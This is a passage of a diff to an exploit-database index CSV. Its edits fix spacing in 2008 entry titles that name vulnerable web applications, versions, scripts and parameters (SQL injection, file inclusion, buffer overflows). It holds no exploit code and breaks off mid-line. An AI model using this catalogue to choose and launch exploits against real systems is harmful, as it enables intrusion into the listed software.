-5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto'SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 @@ -5203,7 +5204,7 @@ id,file,description,date,author,platform,type,port 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - (getfile.php) Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0 -5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat'SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 +5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion Exploit",2008-05-09,cOndemned,php,webapps,0 5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 @@ -5234,8 +5235,8 @@ id,file,description,date,author,platform,type,port 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0 5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) SQL Injection",2008-05-13,His0k4,php,webapps,0 5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps,0 -5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'news.php ida'SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 -5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'dpage.php docID'SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'news.php ida' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'dpage.php docID' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5611,platforms/php/webapps/5611.txt,"Linkspile - 'link.php cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 @@ -5428,13 +5429,13 @@ id,file,description,date,author,platform,type,port 5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 5805,platforms/asp/webapps/5805.txt,"E-SMART CART - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 -5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort'Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 +5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 -5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat'SQL Injection",2008-06-14,anonymous,php,webapps,0 +5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 @@ -5457,7 +5458,7 @@ id,file,description,date,author,platform,type,port 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - 'index.php r'SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - 'index.php r' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 @@ -5475,11 +5476,11 @@ id,file,description,date,author,platform,type,port 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - vb6skit.dll Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS - 'shownews.php newsid' SQL Injection",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'index.php cat'SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'index.php cat' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - (index.php postid) SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 5856,platforms/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 -5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'index.php cat'SQL Injection",2008-06-18,Stack,php,webapps,0 -5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'index.php type'SQL Injection",2008-06-18,Stack,php,webapps,0 +5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'index.php cat' SQL Injection",2008-06-18,Stack,php,webapps,0 +5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'index.php type' SQL Injection",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 @@ -5520,7 +5521,7 @@ id,file,description,date,author,platform,type,port 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 -5900,platforms/php/webapps/5900.txt,"RSS-Aggregator - 'display.php path'Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 +5900,platforms/php/webapps/5900.txt,"RSS-Aggregator - 'display.php path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 @@ -5533,7 +5534,7 @@ id,file,description,date,author,platform,type,port 5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'pages.php menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - (guide.php id) SQL Injection",2008-06-23,dun,php,webapps,0 5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 -5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL / Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 +5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 5914,platforms/php/webapps/5914.txt,"Demo4 CMS - 'index.php id' SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0 5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 @@ -5685,7 +5686,7 @@ id,file,description,date,author,platform,type,port 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 -6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang'Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 +6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 @@ -5718,13 +5719,13 @@ id,file,description,date,author,platform,type,port 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key'Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution Exploit (Perl) (2)",2008-07-21,"Guido Landi",windows,local,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo'Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo'Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6111,platforms/cgi/webapps/6111.pl,"MojoAuto - 'mojoAuto.cgi mojo'Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6111,platforms/cgi/webapps/6111.pl,"MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 @@ -5760,7 +5761,7 @@ id,file,description,date,author,platform,type,port 6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID'SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - (language) Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 @@ -5778,7 +5779,7 @@ id,file,description,date,author,platform,type,port 6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 -6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID'SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 @@ -5919,7 +5920,7 @@ id,file,description,date,author,platform,type,port 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 -6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj'Local Buffer Overflow Exploit",2008-08-30,Koshi,windows,local,0 +6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 @@ -5944,14 +5945,14 @@ id,file,description,date,author,platform,type,port 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 -6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r'SQL Injection",2008-09-03,"Hussin X",php,webapps,0 +6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote Buffer Overflow Exploit",2008-09-05,SVRT,windows,remote,0 -6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort'Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 +6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 @@ -6040,14 +6041,14 @@ id,file,description,date,author,platform,type,port 6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - (Cookie) SQL Injection",2008-09-15,StAkeR,php,webapps,0 6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 -6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c'SQL Injection",2008-09-15,JosS,php,webapps,0 +6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0 6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0 6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 -6470,platforms/asp/webapps/6470.txt,"Hotel reservation System - 'city.asp city'Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 +6470,platforms/asp/webapps/6470.txt,"Hotel reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / ITunes 8.0 - Remote Off-by-One Crash Exploit",2008-09-16,securfrog,multiple,dos,0 -6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward'Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos,0 +6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos,0 6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0 @@ -6095,7 +6096,7 @@ id,file,description,date,author,platform,type,port 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 -6522,platforms/php/webapps/6522.txt,"Availscript Article Script - 'view.php v'SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6522,platforms/php/webapps/6522.txt,"Availscript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 @@ -6114,7 +6115,7 @@ id,file,description,date,author,platform,type,port 6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps,0 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 -6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'sayfa.php kat'SQL Injection",2008-09-23,d3v1l,php,webapps,0 +6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'sayfa.php kat' SQL Injection",2008-09-23,d3v1l,php,webapps,0 6543,platforms/php/webapps/6543.txt,"Ol Bookmarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 6545,platforms/php/webapps/6545.txt,"Hotscripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0 @@ -6160,7 +6161,7 @@ id,file,description,date,author,platform,type,port 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal - (lang) Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 -6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - '.ico'Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 +6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 @@ -6198,7 +6199,7 @@ id,file,description,date,author,platform,type,port 6624,platforms/php/webapps/6624.txt,"Arcadem Pro - (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0 -6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss'Local File Inclusion",2008-09-29,JIKO,php,webapps,0 +6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0 6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0 @@ -6290,7 +6291,7 @@ id,file,description,date,author,platform,type,port 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Authenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 -6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq'SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 +6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6723,platforms/php/webapps/6723.txt,"Joomla Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6724,platforms/php/webapps/6724.txt,"Joomla Component mad4joomla - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL 